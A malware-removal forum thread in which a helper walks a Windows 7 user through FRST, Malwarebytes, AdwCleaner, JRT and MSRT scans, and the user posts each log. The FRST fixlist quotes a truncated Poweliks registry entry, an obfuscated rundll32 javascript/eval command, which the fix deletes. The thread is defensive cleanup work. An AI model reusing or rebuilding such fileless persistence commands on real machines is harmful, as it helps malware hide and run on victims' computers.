Error: (10/28/2014 10:07:56 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 10.0.9200.17116, time stamp: 0x4a5bc6b7
Faulting module name: ntdll.dll, version: 6.1.7601.18247, time stamp: 0x521ea8e7
Exception code: 0xc00000fd
Fault offset: 0x0002e04e
Faulting process id: 0x2278
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (10/19/2014 11:46:42 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program IEXPLORE.EXE version 10.0.9200.17116 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: 2614

Start Time: 01cfec207c6bd3ce

Termination Time: 22

Application Path: C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

Report Id:

Error: (10/18/2014 10:51:20 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: Unloading the performance counter strings for service WmiApRpl (WmiApRpl) failed. The first DWORD in the Data section contains the error code.

System errors:
=============
Error: (10/29/2014 00:16:09 PM) (Source: WMPNetworkSvc) (EventID: 14346) (User: )
Description: 0x80040154

Error: (10/29/2014 00:16:09 PM) (Source: WMPNetworkSvc) (EventID: 14346) (User: )
Description: 0x80040154

Error: (10/29/2014 00:16:01 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (10/29/2014 00:14:30 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The regi service failed to start due to the following error:
%%2

Error: (10/29/2014 00:09:23 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Diagnostic Policy Service service failed to start due to the following error:
%%1069

Error: (10/29/2014 00:09:23 PM) (Source: Service Control Manager) (EventID: 7038) (User: )
Description: The DPS service was unable to log on as NT AUTHORITY\LocalService with the currently configured password due to the following error:
%%50

To ensure that the service is configured properly, use the Services snap-in in Microsoft Management Console (MMC).

Error: (10/29/2014 00:09:23 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Base Filtering Engine service failed to start due to the following error:
%%1069

Error: (10/29/2014 00:09:23 PM) (Source: Service Control Manager) (EventID: 7038) (User: )
Description: The BFE service was unable to log on as NT AUTHORITY\LocalService with the currently configured password due to the following error:
%%50

To ensure that the service is configured properly, use the Services snap-in in Microsoft Management Console (MMC).

Error: (10/29/2014 00:09:23 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Windows Firewall service depends on the Base Filtering Engine service which failed to start because of the following error:
%%1069

Error: (10/29/2014 00:09:23 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Base Filtering Engine service failed to start due to the following error:
%%1069

Microsoft Office Sessions:
=========================
Error: (05/27/2011 10:48:56 AM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 3, Application Name: Microsoft Office PowerPoint, Application Version: 12.0.6545.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 6 seconds with 0 seconds of active time.  This session ended with a crash.

Error: (09/20/2010 11:05:12 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6541.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 6 seconds with 0 seconds of active time.  This session ended with a crash.

CodeIntegrity Errors:
===================================
  Date: 2014-10-29 11:44:06.791
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files (x86)\AVG\AVG2015\avghooka.dll because the set of per-page image hashes could not be found on the system.

  Date: 2009-12-02 12:51:40.835
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\swwork\DPIUP\TPDEVPE.SYS because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2009-12-02 12:51:40.835
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\swwork\DPIUP\TPDEVPE.SYS because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

[chazzini]

I'm not sure if I need I need to shut off my antennae so the dllhost.exe stops running.  It is constantly running with the wifi on.  If I shut off wifi, it stops.  Not sure if leaving the wifi on is enabling the spyware to access stuff or make the problem worse.

[kevinf80]

Continue as follows:

 

Download attached fixlist.txt file (end of reply) and save it to the Desktop, or the folder you saved FRST into.

NOTE. It's important that both FRST and fixlist.txt are in the same location or the fix will not work.

 

Run FRST and press the Fix button just once and wait.

The tool will make a log on the Desktop (Fixlog.txt) or the folder it was ran from. Please post it to your reply.

 

Next,

 

Open Malwarebytes Anti-Malware, from the Dashboard please Check for Updates by clicking the Update Now... link

When the update completes select > Settings > Detection and Protection > Enable Scan for rootkit and Under Non Malware Protection set both PUP and PUM to Treat detections as malware.

 

 

Click on the SCAN button and run a Threat Scan with Malwarebytes Anti-Malware by clicking the Scan Now>> button.

 

When the scan is complete, if there have been detections, click Apply Actions to allow MBAM to clean what was detected.

 

 

In most cases, a restart will be required.

 

 

Wait for the prompt to restart the computer to appear, then click on Yes.

 

 

Once completed please click on the History > Application Logs and find your scan log and open it and then click on the "copy to clipboard" button and post back the results on your next reply.

 

Next,

 

Download AdwCleaner by Xplode onto your Desktop.

• 
  

Double click on Adwcleaner.exe to run the tool.
Click on Scan
Once the scan is done, click on the Clean button.
You will get a prompt asking to close all programs. Click OK.
Click OK again to reboot your computer.
A text file will open after the restart. Please post the content of that logfile in your reply.
You can also find the logfile at C:\AdwCleaner[sn].txt. Where n in the scan reference number

 

Next,

 

Please download Junkware Removal Tool to your desktop.

• 
  

Shut down your protection software now to avoid potential conflicts. (re-enable when done)
Run the tool by double-clicking it. If you are using Windows Vista, 7, or 8; instead of double-clicking, right-mouse click JRT.exe and select "Run as Administrator".
The tool will open and start scanning your system.
Please be patient as this can take a while to complete depending on your system's specifications.
On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
Post the contents of JRT.txt into your next message.

 

Next,

 

Download Microsoft's " Malicious Software Removal Tool" and save direct to the desktop

Ensure to get the correct version for your system....

32 Bit version:

https://www.microsoft.com/downloads/en/confirmation.aspx?FamilyId=AD724AE0-E72D-4F54-9AB3-75B8EB148356&displaylang=en

64 Bit version:

https://www.microsoft.com/downloads/en/confirmation.aspx?FamilyId=585D2BDE-367F-495E-94E7-6349F4EFFC74&displaylang=en'>https://www.microsoft.com/downloads/en/confirmation.aspx?FamilyId=585D2BDE-367F-495E-94E7-6349F4EFFC74&displaylang=en

 

Right click on the Tool, select “Run as Administrator” the tool will expand to the options Window

In the "Scan Type" window, select Quick Scan

Perform a scan and  Click Finish when the scan is done.

Retrieve the MSRT log as follows, and post it in your next reply:

 

1) Select the Windows key and R key together to open the "Run" function

2) Type or Copy/Paste the following command to the "Run Line" and Press Enter:

 

notepad c:\windows\debug\mrt.log

 

Let me see those logs in your next reply, also give an update on any remaining issues or concerns..

 

Kevin...

 

 

 

 

 

 

Fixlist.txt

[chazzini]

Fixlog below.  Will reply with Malware scan history next.

 

 

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 29-10-2014 01
Ran by Charles at 2014-10-29 17:41:20 Run:1
Running from C:\Users\Charles\Desktop
Loaded Profile: Charles (Available profiles: Charles)
Boot Mode: Normal
==============================================

Content of fixlist:
*****************
Start
HKU\S-1-5-21-3094523011-22438472-3966868382-1003\...\MountPoints2: {f397cc25-9f37-11e0-9bf5-00226819c704} - D:\LaunchU3.exe
HKU\S-1-5-21-3094523011-22438472-3966868382-1003\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
S2 regi; \??\C:\Windows\system32\drivers\regi.sys [X]
S3 RimUsb; System32\Drivers\RimUsb_AMD64.sys [X]
S3 vpnva; system32\DRIVERS\vpnva64.sys [X]
C:\Users\Charles\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmp2qaslf.dll
C:\Users\Charles\AppData\Local\Temp\jre-7u71-windows-i586-iftw.exe
CustomCLSID: HKU\S-1-5-21-3094523011-22438472-3966868382-1003_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
AlternateDataStreams: C:\ProgramData\TEMP:40F038C5
AlternateDataStreams: C:\ProgramData\TEMP:C74D7A47
EmptyTemp:
End

*****************

"HKU\S-1-5-21-3094523011-22438472-3966868382-1003\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{f397cc25-9f37-11e0-9bf5-00226819c704}" => Key deleted successfully.
"HKCR\CLSID\{f397cc25-9f37-11e0-9bf5-00226819c704}" => Key not found.
"HKU\S-1-5-21-3094523011-22438472-3966868382-1003\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32" => Key Deleted Successfully.
"HKU\S-1-5-21-3094523011-22438472-3966868382-1003\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key deleted successfully.
regi => Service deleted successfully.
RimUsb => Service deleted successfully.
vpnva => Service deleted successfully.
C:\Users\Charles\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmp2qaslf.dll => Moved successfully.
C:\Users\Charles\AppData\Local\Temp\jre-7u71-windows-i586-iftw.exe => Moved successfully.
"HKU\S-1-5-21-3094523011-22438472-3966868382-1003_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key not found.
C:\ProgramData\TEMP => ":40F038C5" ADS removed successfully.
C:\ProgramData\TEMP => ":C74D7A47" ADS removed successfully.
EmptyTemp: => Removed 4.1 GB temporary data.

The system needed a reboot.

==== End of Fixlog ====

[kevinf80]

Thanks for the log, post the others when ready....

[chazzini]

Malwarebytes scan log below.  AdwCleaner next

 

 

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 10/29/2014
Scan Time: 6:06:30 PM
Logfile:
Administrator: Yes

Version: 2.00.3.1025
Malware Database: v2014.10.29.08
Rootkit Database: v2014.10.22.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled

OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: Charles

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 341431
Time Elapsed: 21 min, 20 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 0
(No malicious items detected)

Registry Values: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 0
(No malicious items detected)

Physical Sectors: 0
(No malicious items detected)

(end)

[kevinf80]

thanks for the log....

[chazzini]

AdwCleaner log below.  Junkware removal tool next.

 

# AdwCleaner v3.311 - Report created 29/10/2014 at 18:34:49
# Updated 30/09/2014 by Xplode
# Operating System : Windows 7 Home Premium Service Pack 1 (64 bits)
# Username : Charles - CHARLES-THINK
# Running from : C:\Users\Charles\Desktop\AdwCleaner.exe
# Option : Clean

***** [ Services ] *****

Service Deleted : Viewpoint Manager Service

***** [ Files / Folders ] *****

Folder Deleted : C:\ProgramData\AVG Security Toolbar
Folder Deleted : C:\ProgramData\Premium
Folder Deleted : C:\ProgramData\Viewpoint
Folder Deleted : C:\Program Files (x86)\Viewpoint
Folder Deleted : C:\Program Files (x86)\Common Files\Viewpoint
File Deleted : C:\END
File Deleted : C:\Users\Charles\AppData\Roaming\Mozilla\Firefox\Profiles\4orzi33e.default\searchplugins\avg-secure-search.xml

***** [ Scheduled Tasks ] *****

***** [ Shortcuts ] *****

***** [ Registry ] *****

Key Deleted : HKLM\SOFTWARE\Google\Chrome\Extensions\jpnbdefcbnoefmmcpelplabbkfmfhlho
Key Deleted : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\VWPT
Key Deleted : HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{03F998B2-0E00-11D3-A498-00104B6EB52E}
Key Deleted : HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{1B00725B-C455-4DE6-BFB6-AD540AD427CD}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{03F998B2-0E00-11D3-A498-00104B6EB52E}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{0E2C3126-DDED-4A58-800E-9AEDE84EA31E}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{1B00725B-C455-4DE6-BFB6-AD540AD427CD}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{A7327C09-B521-4EDB-8509-7D2660C9EC98}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{F8AD5AA5-D966-4667-9DAF-2561D68B2012}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{0B79C149-3B19-40DE-92BF-1A3AD9C1DA9D}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{229C56BB-A36A-4323-8C82-B136DF45697D}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{33E2B3CB-322E-4CBE-89F2-C06F5A35DB46}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{51080E66-F357-4F2A-9BFC-2456695883B5}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{537AD3CF-DE2B-4A1C-8279-C946B7E490D4}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{5BF7365D-25FF-40F3-8DEE-06ABEDF177CC}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{6DDA37BA-0553-499A-AE0D-BEBA67204548}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{A10A1344-B533-4C9E-BE4E-4C5BC4953047}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{BA94BCE1-7E60-422D-9E7D-B853BC03FE78}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{BDCE611F-FDAA-4B10-A8E8-220A7897A69F}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{D0F1E414-1FAE-466C-B122-DE735B7BFF9D}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{E458510C-1DD5-4A05-8C4C-53BEF69C05E7}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{03E2A1F3-4402-4121-8B35-733216D61217}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{6427058B-217C-4C7F-A6CE-C7934C0BDCEB}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{9E3B11F6-4179-4603-A71B-A55F4BCB0BEC}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{9C049BA6-EA47-4AC3-AED6-A66D8DC9E1D8}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{E060D9D9-E979-4C2F-A840-BE5150F84AC5}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{95B7759C-8C7F-4BF1-B163-73684A933233}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{A7327C09-B521-4EDB-8509-7D2660C9EC98}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{03F998B2-0E00-11D3-A498-00104B6EB52E}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{95B7759C-8C7F-4BF1-B163-73684A933233}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{A7327C09-B521-4EDB-8509-7D2660C9EC98}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{F8AD5AA5-D966-4667-9DAF-2561D68B2012}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{A7327C09-B521-4EDB-8509-7D2660C9EC98}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{F8AD5AA5-D966-4667-9DAF-2561D68B2012}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{03F998B2-0E00-11D3-A498-00104B6EB52E}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{1B00725B-C455-4DE6-BFB6-AD540AD427CD}
Value Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar [{F8AD5AA5-D966-4667-9DAF-2561D68B2012}]
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{03E2A1F3-4402-4121-8B35-733216D61217}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{30B15818-E110-4527-9C05-46ACE5A3460D}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{4E92DB5F-AAD9-49D3-8EAB-B40CBE5B1FF7}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{618AAD04-921F-44C2-BE38-C0818AF69861}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{6427058B-217C-4C7F-A6CE-C7934C0BDCEB}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{9E3B11F6-4179-4603-A71B-A55F4BCB0BEC}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{B5D2ED96-62F9-4C2C-956D-E425B1F67337}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{C401D2CE-DC27-45C7-BC0C-8E6EA7F085D6}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{D3A412E8-1E4B-47D2-9B12-F88291F5AFBB}
Key Deleted : HKCU\Software\AVG SafeGuard toolbar
Key Deleted : HKCU\Software\Conduit
Key Deleted : HKCU\Software\Viewpoint
Key Deleted : HKCU\Software\YahooPartnerToolbar
Key Deleted : HKCU\Software\Zugo
Key Deleted : HKCU\Software\AppDataLow\HavingFunOnline
Key Deleted : HKLM\SOFTWARE\AVG Secure Search
Key Deleted : HKLM\SOFTWARE\AVG Security Toolbar
Key Deleted : HKLM\SOFTWARE\bflixtoolbar
Key Deleted : HKLM\SOFTWARE\Freeze.com
Key Deleted : HKLM\SOFTWARE\Viewpoint
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Crossrider
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Viewpoint Manager
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Viewpoint Toolbar
Key Deleted : [x64] HKLM\SOFTWARE\DivX\Install\Setup\WizardLayout\ConduitToolbar

***** [ Browsers ] *****

-\\ Internet Explorer v10.0.9200.17116

-\\ Mozilla Firefox v22.0 (en-US)

[ File : C:\Users\Charles\AppData\Roaming\Mozilla\Firefox\Profiles\4orzi33e.default\prefs.js ]

Line Deleted : user_pref("plugin.blocklisted.npviewpoint", true);

*************************

AdwCleaner[R0].txt - [6569 octets] - [29/10/2014 18:33:01]
AdwCleaner[s0].txt - [6360 octets] - [29/10/2014 18:34:49]

########## EOF - C:\AdwCleaner\AdwCleaner[s0].txt - [6420 octets] ##########

[kevinf80]

Thanks for the log....

[chazzini]

Junk Removal Tool log below.  Microsoft malicious program scan next (last one I believe).

 

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Thisisu
Version: 6.3.3 (10.21.2014:1)
OS: Windows 7 Home Premium x64
Ran by Charles on Wed 10/29/2014 at 18:50:45.02
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

 

~~~ Services

 

~~~ Registry Values

 

~~~ Registry Keys

Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{A876E312-7D08-401A-B7A6-FAFC5DC2F292}

 

~~~ Files

 

~~~ Folders

Successfully deleted: [Folder] C:\ProgramData\CodecCheck
Successfully deleted: [Folder] "C:\Program Files (x86)\crossriderwebapps"
Successfully deleted: [Empty Folder] C:\Users\Charles\appdata\local\{100A2AD4-4EDE-48FD-9E13-FC4D7EC81BDC}
Successfully deleted: [Empty Folder] C:\Users\Charles\appdata\local\{254A52AF-D8FB-4EC9-A185-8740BBF4087F}
Successfully deleted: [Empty Folder] C:\Users\Charles\appdata\local\{29322232-83A3-4B84-8511-4B751DB262F6}
Successfully deleted: [Empty Folder] C:\Users\Charles\appdata\local\{2E5314DE-E9CD-4F43-8A06-4FE786A231AE}
Successfully deleted: [Empty Folder] C:\Users\Charles\appdata\local\{2F586B8B-3166-4F2A-9073-887D678568BE}
Successfully deleted: [Empty Folder] C:\Users\Charles\appdata\local\{4EAE486D-A5CA-447F-AED3-E795EDF04D1A}
Successfully deleted: [Empty Folder] C:\Users\Charles\appdata\local\{723F4A84-F5E5-4BAC-B425-D7BBD624BB11}
Successfully deleted: [Empty Folder] C:\Users\Charles\appdata\local\{8D92D09F-B979-4264-8E6A-4C120370733F}
Successfully deleted: [Empty Folder] C:\Users\Charles\appdata\local\{915473C0-63EE-4CEB-80AC-5A641CB1560E}
Successfully deleted: [Empty Folder] C:\Users\Charles\appdata\local\{A513F064-1951-4B77-9974-694233599CCD}
Successfully deleted: [Empty Folder] C:\Users\Charles\appdata\local\{D9332097-2DB2-41B6-BDB2-66DDBD972707}
Successfully deleted: [Empty Folder] C:\Users\Charles\appdata\local\{E526EEAC-80FB-490F-85F4-AA7198556EC7}
Successfully deleted: [Empty Folder] C:\Users\Charles\appdata\local\{EBE2C52E-A548-451F-9E4A-B499EE31642C}
Successfully deleted: [Empty Folder] C:\Users\Charles\appdata\local\{F0391DDC-F59B-49CB-B269-FA5F074934BD}
Successfully deleted: [Empty Folder] C:\Users\Charles\appdata\local\{F6FFDC3E-7653-46CE-8A54-EF52E469E0A2}

 

~~~ Event Viewer Logs were cleared

 

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Wed 10/29/2014 at 18:56:47.67
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

[kevinf80]

Thanks for the log, yep MRST will be the last one.

[chazzini]

Here's the last one.  Am I in the clear?  It seems so as my laptop is not running at 95% cpu.

 

---------------------------------------------------------------------------------------

Microsoft Windows Malicious Software Removal Tool v4.6, March 2012
Started On Sun Mar 18 18:49:54 2012

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Sun Mar 18 18:52:16 2012

Return code: 0 (0x0)

---------------------------------------------------------------------------------------

Microsoft Windows Malicious Software Removal Tool v4.7, April 2012
Started On Sat Apr 14 16:59:39 2012
->Scan ERROR: resource process://pid:524 (code 0x00000490 (1168))
->Scan ERROR: resource process://pid:7880 (code 0x00000490 (1168))
->Scan ERROR: resource process://pid:8760 (code 0x00000490 (1168))

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Sat Apr 14 17:09:56 2012

Return code: 0 (0x0)

---------------------------------------------------------------------------------------

Microsoft Windows Malicious Software Removal Tool v4.8, May 2012
Started On Wed May 09 22:24:12 2012
->Scan ERROR: resource process://pid:9376 (code 0x00000490 (1168))
->Scan ERROR: resource process://pid:9772 (code 0x00000490 (1168))

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Wed May 09 22:29:18 2012

Return code: 0 (0x0)

---------------------------------------------------------------------------------------

Microsoft Windows Malicious Software Removal Tool v4.9, June 2012
Started On Fri Jun 15 21:45:21 2012

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Fri Jun 15 21:47:45 2012

Return code: 0 (0x0)

---------------------------------------------------------------------------------------

Microsoft Windows Malicious Software Removal Tool v4.10, July 2012
Started On Sun Jul 15 22:34:01 2012

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Sun Jul 15 22:36:47 2012

Return code: 0 (0x0)

---------------------------------------------------------------------------------------

Microsoft Windows Malicious Software Removal Tool v4.11, August 2012
Started On Thu Aug 16 22:30:11 2012
->Scan ERROR: resource process://pid:5268 (code 0x00000005 (5))

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Thu Aug 16 22:32:50 2012

Return code: 0 (0x0)

---------------------------------------------------------------------------------------

Microsoft Windows Malicious Software Removal Tool v4.12, September 2012
Started On Sat Sep 15 00:04:02 2012
->Scan ERROR: resource process://pid:7640 (code 0x00000490 (1168))
->Scan ERROR: resource process://pid:5316 (code 0x00000490 (1168))
->Scan ERROR: resource process://pid:5096 (code 0x00000490 (1168))
->Scan ERROR: resource process://pid:7192 (code 0x00000005 (5))

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Sat Sep 15 00:06:50 2012

Return code: 0 (0x0)

---------------------------------------------------------------------------------------

Microsoft Windows Malicious Software Removal Tool v4.13, October 2012
Started On Mon Oct 15 21:48:48 2012

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Mon Oct 15 21:51:07 2012

Return code: 0 (0x0)

---------------------------------------------------------------------------------------

Microsoft Windows Malicious Software Removal Tool v4.14, November 2012
Started On Tue Nov 20 22:09:45 2012
->Scan ERROR: resource process://pid:168 (code 0x00000490 (1168))
->Scan ERROR: resource process://pid:5444 (code 0x00000490 (1168))
->Scan ERROR: resource process://pid:8124 (code 0x00000490 (1168))

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Tue Nov 20 22:12:33 2012

Return code: 0 (0x0)

---------------------------------------------------------------------------------------

Microsoft Windows Malicious Software Removal Tool v4.15, December 2012
Started On Thu Dec 13 22:22:08 2012
->Scan ERROR: resource process://pid:4860 (code 0x00000490 (1168))
->Scan ERROR: resource process://pid:3752 (code 0x00000005 (5))

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Thu Dec 13 22:26:19 2012

Return code: 0 (0x0)

---------------------------------------------------------------------------------------

Microsoft Windows Malicious Software Removal Tool v4.16, January 2013
Started On Thu Jan 10 21:11:57 2013
->Scan ERROR: resource process://pid:4032 (code 0x00000490 (1168))
->Scan ERROR: resource process://pid:2440 (code 0x00000490 (1168))

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Thu Jan 10 21:15:52 2013

Return code: 0 (0x0)

---------------------------------------------------------------------------------------

Microsoft Windows Malicious Software Removal Tool v4.17, February 2013
Started On Thu Feb 14 23:57:33 2013
->Scan ERROR: resource process://pid:2428 (code 0x00000005 (5))

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Fri Feb 15 00:09:53 2013

Return code: 0 (0x0)

---------------------------------------------------------------------------------------

Microsoft Windows Malicious Software Removal Tool v4.18, March 2013
Started On Thu Mar 14 03:01:23 2013
->Scan ERROR: resource process://pid:7192 (code 0x00000005 (5))

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Thu Mar 14 03:04:43 2013

Return code: 0 (0x0)

---------------------------------------------------------------------------------------

Microsoft Windows Malicious Software Removal Tool v4.19, April 2013
Started On Wed Apr 10 04:37:24 2013
->Scan ERROR: resource process://pid:2364 (code 0x00000005 (5))
->Scan ERROR: resource process://pid:4188 (code 0x00000490 (1168))
->Scan ERROR: resource process://pid:3168 (code 0x00000490 (1168))

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Wed Apr 10 04:40:17 2013

Return code: 0 (0x0)

---------------------------------------------------------------------------------------

Microsoft Windows Malicious Software Removal Tool v4.20, May 2013
Started On Thu May 16 01:28:50 2013

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Thu May 16 01:32:25 2013

Return code: 0 (0x0)

---------------------------------------------------------------------------------------

Microsoft Windows Malicious Software Removal Tool v4.21, June 2013
Started On Thu Jun 13 23:29:35 2013

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Thu Jun 13 23:32:03 2013

Return code: 0 (0x0)

---------------------------------------------------------------------------------------

Microsoft Windows Malicious Software Removal Tool v4.22, July 2013
Started On Wed Jul 17 09:00:05 2013

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Wed Jul 17 09:02:21 2013

Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.2, July 2013 (build 5.2.9201.0)
Started On Wed Jul 17 22:18:30 2013

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Wed Jul 17 22:22:09 2013

Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.3, August 2013 (build 5.3.9301.0)
Started On Wed Aug 28 00:26:05 2013

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Wed Aug 28 00:31:15 2013

Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.4, September 2013 (build 5.4.9400.0)
Started On Thu Sep 12 00:18:25 2013

Engine: 1.1.9800.0
Signatures: 1.157.932.0

Results Summary:
----------------
No infection found.
